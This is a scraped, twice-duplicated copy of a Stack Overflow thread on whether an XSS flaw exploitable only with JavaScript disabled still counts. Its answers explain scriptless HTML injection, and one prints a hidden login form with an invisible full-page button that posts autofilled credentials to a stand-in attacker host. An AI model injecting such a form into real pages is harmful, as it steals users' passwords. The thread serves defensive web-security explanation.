XSS exploit when JavaScript is disabled - Stack Overflow

admin管理员组

文章数量:1025481

I'm getting pretty frustrated trying to make McAffee whitelist a supposed exploit on a site i work on. The issue is that their automated system has detected a supposed XSS exploit but the exploit only exists when JavaScript is disabled. Given the fact that you need JavaScript to be disabled for the exploit to exist then surely this means this is not an exploit. Can anyone think of any possible arguments to the contrary?

Update - To add more detail:

The problem es from in one place unsanitized URL content is written to an anchor tag href.So, with JS disabled you could have something like this:

<a href="foor.php?"><script>alert('foo')</script>#someanchor" ..

When JavaScript is enabled this href is updated to be this (on dom ready):

<a href="javascript:;">link</a>

So, with JS enabled the link is no longer injected, with JS disabled the alert would no longer execute.

I'm getting pretty frustrated trying to make McAffee whitelist a supposed exploit on a site i work on. The issue is that their automated system has detected a supposed XSS exploit but the exploit only exists when JavaScript is disabled. Given the fact that you need JavaScript to be disabled for the exploit to exist then surely this means this is not an exploit. Can anyone think of any possible arguments to the contrary?

Update - To add more detail:

The problem es from in one place unsanitized URL content is written to an anchor tag href.So, with JS disabled you could have something like this:

<a href="foor.php?"><script>alert('foo')</script>#someanchor" ..

When JavaScript is enabled this href is updated to be this (on dom ready):

<a href="javascript:;">link</a>

So, with JS enabled the link is no longer injected, with JS disabled the alert would no longer execute.

• javascript
• xss

Share Improve this question Follow edited Jun 6, 2010 at 17:52 John Conde 220k9999 gold badges463463 silver badges502502 bronze badges asked Jun 4, 2010 at 11:13 robjmillsrobjmills 18.6k1616 gold badges8080 silver badges123123 bronze badges 2

• 2 Relying on JavaScript to fix XSS doesn't seem like the most solid plan to me....? – JAL Commented Jun 6, 2010 at 17:56
• Are you having a conversation with yourself? :P – alex Commented Nov 28, 2010 at 0:04

Add a ment  | 

5 Answers 5

Sorted by: Reset to default 3

You need to change your page.

<a href="default_for_javascript_disabled" id="speciallink">link</a>

<script type="text/javascript">
    var link = document.getElementById("speciallink");
    link.href = "value_for_javascript_enabled";
</script>

If your site has a login form and user has password autofill enabled, I might want to inject something like the following:

<form action="http://evil.hackademix/log" method="POST">
<div style="position: absolute; top: -5000px">
<input type="text" name="username">
<input type="password" name="password">
</div>
<input type="submit" value="pwn me" 
style="opacity: 0; position: absolute; left: 0; top: 0; width: 100%; height: 100%;"
>
</form>

As soon as user clicks anywhere on the page, his credentials get logged on my site :) It's not XSS in strict sense (unless you consider HTML+CSS "scripting" lato sensu), but is almost equally nefarious.

The only example I can think of that would exploit your page when JavaScriptis disabled is when you rely too much on the JavaScript.

Imagine the situation when you have some sort of clickable button, and you want to hide it from the user on page load / on tab change etc using CSS changed by JavaScript.

In the normal situation you know normal user won't be able to see this button because it's hidden, but if JavaScript is disabled all the content of the page will render straight away displaying some 'hidden' features. (I'm writing word hidden in apostrophes, because hiding stuff using CSS is a bad idea to start with, but again it all depends what sort of functionality our button has).

Other example:

<a href="/nice/clean/url/" onclick="Update.Panel.Using(Ajax); return false;">Next Page</a>

As you can see this time when JavaScript is disabled user will be redirected to the url of the link and update panel action won't be executed. Mostly you use this trick to redirect website crawlers to the correct page from href tag and treat a users differently because on their browsers JavaScript is on, so you can do some 'cool stuff'.

I'm not sure if this correctly answers your question but in general - just make sure the functionality is replicated / is working the same way as it does when JavaScript is on.

I don't understand "When JavaScript is enabled this href is updated" bit.

If you do it on server-side, then it must be based on some prior detection, which can't be perfectly accurate. Attacker could probably fool detection with CSRF (e.g. make victim open example./?disabled_js=1 before being redirected to XSS-vulnerable page).

If you're doing in on client-side, then it's already too late, as injected HTML will be parsed before your script runs.

To answer your question — XSS is not possible when user has JS disabled. However, there are other attacks, like phishing and CSRF that HTML injection helps.

Ooops, my HTML got lost in my previous answer. However, a malicious scriptless HTML injection may look like this:

<form action="http://evil.hackademix/log" method="POST">
    <div style="position: absolute; top: -5000px">
    <input type="text" name="username">
    <input type="password" name="password">
    </div>
    <input type="submit" value="pwn me" 
    style="opacity: 0; position: absolute; left: 0; top: 0; width: 100%; height: 100%;"
    >
</form>

Not to mention nice things you could do using or elements...

I'm getting pretty frustrated trying to make McAffee whitelist a supposed exploit on a site i work on. The issue is that their automated system has detected a supposed XSS exploit but the exploit only exists when JavaScript is disabled. Given the fact that you need JavaScript to be disabled for the exploit to exist then surely this means this is not an exploit. Can anyone think of any possible arguments to the contrary?

Update - To add more detail:

The problem es from in one place unsanitized URL content is written to an anchor tag href.So, with JS disabled you could have something like this:

<a href="foor.php?"><script>alert('foo')</script>#someanchor" ..

When JavaScript is enabled this href is updated to be this (on dom ready):

<a href="javascript:;">link</a>

So, with JS enabled the link is no longer injected, with JS disabled the alert would no longer execute.

I'm getting pretty frustrated trying to make McAffee whitelist a supposed exploit on a site i work on. The issue is that their automated system has detected a supposed XSS exploit but the exploit only exists when JavaScript is disabled. Given the fact that you need JavaScript to be disabled for the exploit to exist then surely this means this is not an exploit. Can anyone think of any possible arguments to the contrary?

Update - To add more detail:

The problem es from in one place unsanitized URL content is written to an anchor tag href.So, with JS disabled you could have something like this:

<a href="foor.php?"><script>alert('foo')</script>#someanchor" ..

When JavaScript is enabled this href is updated to be this (on dom ready):

<a href="javascript:;">link</a>

So, with JS enabled the link is no longer injected, with JS disabled the alert would no longer execute.

• javascript
• xss

Share Improve this question Follow edited Jun 6, 2010 at 17:52 John Conde 220k9999 gold badges463463 silver badges502502 bronze badges asked Jun 4, 2010 at 11:13 robjmillsrobjmills 18.6k1616 gold badges8080 silver badges123123 bronze badges 2

• 2 Relying on JavaScript to fix XSS doesn't seem like the most solid plan to me....? – JAL Commented Jun 6, 2010 at 17:56
• Are you having a conversation with yourself? :P – alex Commented Nov 28, 2010 at 0:04

Add a ment  | 

5 Answers 5

Sorted by: Reset to default 3

You need to change your page.

<a href="default_for_javascript_disabled" id="speciallink">link</a>

<script type="text/javascript">
    var link = document.getElementById("speciallink");
    link.href = "value_for_javascript_enabled";
</script>

If your site has a login form and user has password autofill enabled, I might want to inject something like the following:

<form action="http://evil.hackademix/log" method="POST">
<div style="position: absolute; top: -5000px">
<input type="text" name="username">
<input type="password" name="password">
</div>
<input type="submit" value="pwn me" 
style="opacity: 0; position: absolute; left: 0; top: 0; width: 100%; height: 100%;"
>
</form>

As soon as user clicks anywhere on the page, his credentials get logged on my site :) It's not XSS in strict sense (unless you consider HTML+CSS "scripting" lato sensu), but is almost equally nefarious.

The only example I can think of that would exploit your page when JavaScriptis disabled is when you rely too much on the JavaScript.

Imagine the situation when you have some sort of clickable button, and you want to hide it from the user on page load / on tab change etc using CSS changed by JavaScript.

In the normal situation you know normal user won't be able to see this button because it's hidden, but if JavaScript is disabled all the content of the page will render straight away displaying some 'hidden' features. (I'm writing word hidden in apostrophes, because hiding stuff using CSS is a bad idea to start with, but again it all depends what sort of functionality our button has).

Other example:

<a href="/nice/clean/url/" onclick="Update.Panel.Using(Ajax); return false;">Next Page</a>

As you can see this time when JavaScript is disabled user will be redirected to the url of the link and update panel action won't be executed. Mostly you use this trick to redirect website crawlers to the correct page from href tag and treat a users differently because on their browsers JavaScript is on, so you can do some 'cool stuff'.

I'm not sure if this correctly answers your question but in general - just make sure the functionality is replicated / is working the same way as it does when JavaScript is on.

I don't understand "When JavaScript is enabled this href is updated" bit.

If you do it on server-side, then it must be based on some prior detection, which can't be perfectly accurate. Attacker could probably fool detection with CSRF (e.g. make victim open example./?disabled_js=1 before being redirected to XSS-vulnerable page).

If you're doing in on client-side, then it's already too late, as injected HTML will be parsed before your script runs.

To answer your question — XSS is not possible when user has JS disabled. However, there are other attacks, like phishing and CSRF that HTML injection helps.

Ooops, my HTML got lost in my previous answer. However, a malicious scriptless HTML injection may look like this:

<form action="http://evil.hackademix/log" method="POST">
    <div style="position: absolute; top: -5000px">
    <input type="text" name="username">
    <input type="password" name="password">
    </div>
    <input type="submit" value="pwn me" 
    style="opacity: 0; position: absolute; left: 0; top: 0; width: 100%; height: 100%;"
    >
</form>

Not to mention nice things you could do using or elements...

本文标签： XSS exploit when JavaScript is disabledStack Overflow